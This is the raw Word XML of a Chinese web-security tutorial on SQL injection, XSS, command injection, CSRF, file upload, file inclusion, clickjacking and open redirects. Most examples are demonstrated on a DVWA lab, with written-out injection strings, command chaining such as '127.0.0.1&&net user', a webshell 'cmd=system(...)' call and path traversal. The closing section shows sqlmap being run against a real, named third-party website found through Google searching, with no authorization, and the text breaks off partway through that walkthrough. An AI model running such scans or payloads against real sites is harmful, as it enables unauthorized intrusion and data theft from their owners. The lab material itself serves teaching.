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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.漏洞概念及原理分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.1跨SQL注入</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概念：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>SQL Injection按照字面意思来翻译就是“SQL注射”，常被叫做“SQL注入”，它的含义就是利用某些数据库的外部接口把用户数据插入到实际数据库操作语言当中，从而达到入侵数据库乃至操作系统的目的。SQL注入漏洞形成原因是：用户输入的数据被SQL解释器执行。</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原理分析：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>假设如下URL存在漏洞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http://www.xxx.com/xx.asp?id=666</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构造数据库原型：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select * from table_name where id=1</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那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>提交：</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http://www.xxx.com/xx.asp?id=666 and [查询语句]</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select * from table_name where username=‘or’=‘or’ And pass=‘or’=’or’</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这样，如果页面和id=666返回相同的结果，就说明附加查询条件成立，如果不同，就说明不成立。</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手工判断能否进行SQL注入方法：</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第一步先把IE菜单=&gt;工具=&gt;Internet选项=&gt;高级=&gt;显示友好 HTTP 错误信息前面的勾去掉。否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。</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简单判定有无漏洞： 粗略型：提交单引号'</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逻辑型（数字型注入）：and 1=1 / and 1=2</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逻辑型（字符型注入）：' and '1'='1 / ' and '1'='2</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逻辑型（搜索型注入）： 关键字%' and 1=1 and '%'='% / 关键字%' and 1=2 and '%'='%</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危害：获取数据库信息，脱裤，获取服务器权限，植入webshell，获取服务器后门，读取服务器敏感文件等。</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示例：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如下，user id查询框中输入1，则正常显示结果如下：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619375"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="26193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但是，当user id查询框中输入1'时，则显示输出如下：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1152525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="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7"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="11525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则该处存在sql注入漏洞。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目前流行的注入工具有：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>SQLMap、Pangolin（穿山甲）、Havij</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.2跨站脚本攻击（XSS）</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概念：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>通常指黑客通过“HTML注入”篡改了网页，插入了恶意的脚本，从而在用户浏览网页时，实现控制用户浏览器行为的一种攻击方式。</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全称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Cross Site Script（本来缩写是CSS，但是为了和层叠样式表CSS有所区别，所以在安全领域叫做“XSS”）</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危害：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>盗取用户信息、篡改页面钓鱼、制造蠕虫等。</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XSS分类：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>存储型、反射型、DOM型</w:t>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反射型XSS</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反射型XSS只是简单地把用户输入的数据“反射”给浏览器。也就是说，黑客往往需要诱使用户“点击”一个恶意链接，才能攻击成功</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如下，查询name信息，正常用户请求：</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362200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="2362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如果那name参数1修改成，则显示结果：</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562225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="2562225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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存储型XSS</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如下，正常留言或者评论，显示如下：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1628775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="16287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200275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="7"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61"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="22002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如果将message信息写成，则显示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057525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="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7" descr="IMG_262"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="3057525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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DOM XSS</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基于DOM型的XSS是不需要与服务器端交互的，它只发生在客户端处理数据阶段。</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下面一段经典的DOM型XSS示例。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4905375" cy="1123950"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="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63"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4905375" cy="1123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上述代码的意思是获取URL中content参数的值，并且输出，如果输入http://www.xxx.com/dom.html?content=，就会产生XSS漏洞。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各种类型原理分析</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114550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9"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64"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="2114550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.3命令执行漏洞</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漏洞产生原因:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>程序中因为某些功能需要执行系统命令，并通过网页传递参数到 后台执行。然而最根本的原因是没有对输入框的内容做代码过滤，正常情况下输 入框只能接收指定类型的数据。 </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漏洞影响:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>命令注入漏洞可以使攻击在受攻击的服务器上执行任意的系统命令。</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示例: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正常情况下，在 ip 地址输入框中输入 127.0.0.1，结果如下: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867025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1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5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="28670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但是，当我们输入 127.0.0.1&amp;&amp;net user 时，输出结果如下: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333750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="3333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结果显示不仅仅执行了 ping 127.0.0.1 操作，而且也执行了 net user 命令，我们可 以把 net user 换成其他任意命令进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.4跨站请求伪造(CSRF)</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概念:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Cross-Site request forgery，利用用户已登录的身份，在用户毫不知情的情 况下，以用户的名义完成非法操作。</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CSRF 攻击迫使终端用户在通过验证后 web 应用中执行不必要的操作。在社会工 程帮助下(如通过电子邮件/聊天发送的链接)，攻击者可能会迫使 Web 应用程序 用户执行攻击者所选择的行动。 </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危害:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">执行恶意操作(“被转账”、“被发表垃圾评论”等)、制造蠕虫等 </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漏洞影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>:当一个成功的 CSRF 漏洞的目标是普通用户时，它能够危害终端用户 的数据操作。但如果最终的目标用户是管理员账户，一个 CERF 攻击可以损害整 个 Web 应用程序。</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示例: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如下，正常修改密码页面，New password 输入 test，Confirm new password 输入 test，然后提交，密码修改成功。</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057525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1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67"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="30575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我们发现，这个修改密码的请求为 “ http://10.4.70.188/DVWA-1.9/vulnerabilities/csrf/?password_new=test&amp;password_ conf=test&amp;Change=Change ”， 此 时 ， 我 们 打 开 新 的 窗 口 ， 修 改 password_new=password 和 password_conf=password，访问显示如下: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067050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="3067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此时，密码已经被修改成功，如果该 URL 被黑客通过电子邮件或其他途径精心 伪造，诱惑你触发点击，则可直接修改当前用户配置，后果不堪设想。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.5 文件上传漏洞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文件上传漏洞，是指用户上传了一个可执行的脚本文件，并通过此脚本文件获取了执行服务器端命令的能力。这种攻击方式是最为直接和有效的，有时候几乎没有什么技术门槛。</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如下，选择正常的图片文件test.jpg上传，上传成功后显示：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143250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="31432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我们根据显示的路径信息，推测上传图片的地址为“http://10.4.70.188/DVWA-1.9/hackable/uploads/test.jpg”，在浏览器中打开：</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266950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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57"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="2266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那么，我们写一个文件phpinfo.ini，内容为，上传成功后，我们访问该文件显示：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4029075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="17"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58"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="40290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如果我们编辑一句话shell：" "为cmd.php文件，上传成功后访问文件url并且传参cmd=phpinfo()，查看结果如下：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981450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16"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59"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="3981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我们修改cmd参数为任意命令，如cmd= system('dir'); ，显示如下：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219325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="18"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60"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="2219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一旦被黑客利用，后果不堪设想。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.6文件包含漏洞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如下页面，点击file1、file2、file3，页面地址都会随之变化为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600450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="图片 1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61"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="36004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3324225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="20" name="图片 2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62"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="33242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1095375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="21" name="图片 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63"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="10953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1123950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="图片 2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64"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="11239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由此，page参数就是我们可以利用的地方，我们修改page参数为随意字段，如abc.php访问，则显示：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057400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="图片 2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65"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="20574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报错信息中，我们获取到文件的物理路径，可以利用该漏洞读取本地文件，如读取dvwa目录下的php.ini文件，将文件路径进行如下修改：</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828925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="24" name="图片 2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66"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="28289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也就是page参数为"../../php.info"，访问显示如下：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2085975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="25" name="图片 2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67"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="20859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成功读取服务端文件信息，当然，攻击者肯定不满足读取本地文件，攻击者可以修改成可执行php代码进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.7点击劫持（ClickJacking）</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点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的iframe，覆盖在一个网页上，然后诱使用户在该网页上进行操作，此时用户将在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置，可以诱使用户恰好点击在iframe页面的一些功能性按钮上。也就是通过覆盖不可见的框架误导受害者点击而造成的攻击行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隐蔽性高，骗取用户操作，也称UI-覆盖攻击，是利用iframe或者其他标签的属性，如flash也可以。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>URL跳转漏洞与钓鱼</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借助未验证的URL跳转，将应用程序引导到不安全的第三方区域，从而导致的安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL Map实例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通过google hack寻找可能存在sql注入的网址，我找到一个，http://www.xryj.com/pro_detail.asp?id=683，大家不要恶意攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="38" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="016094"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>01</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第一步：查看该网站是否存在sql注入漏洞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执行命令：sqlmap.py -u "http://www.xryj.com/pro_detail.asp?id=683"</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096000" cy="1924050"/>
            <wp:effectExtent l="0" t="0" r="0" b="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29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="1924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结果得出，该服务器类型是Windows 2003 or xp，数据库类型是Access。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="38" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="016094"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>02</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第二步：使用- -tables参数，猜测表名称</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输入命令：sqlmap.py -u "http://www.xryj.com/pro_detail.asp?id=683" –-tables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4114800" cy="2181225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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0"/>
                    <a:stretch>
                      <a:fillRect/>
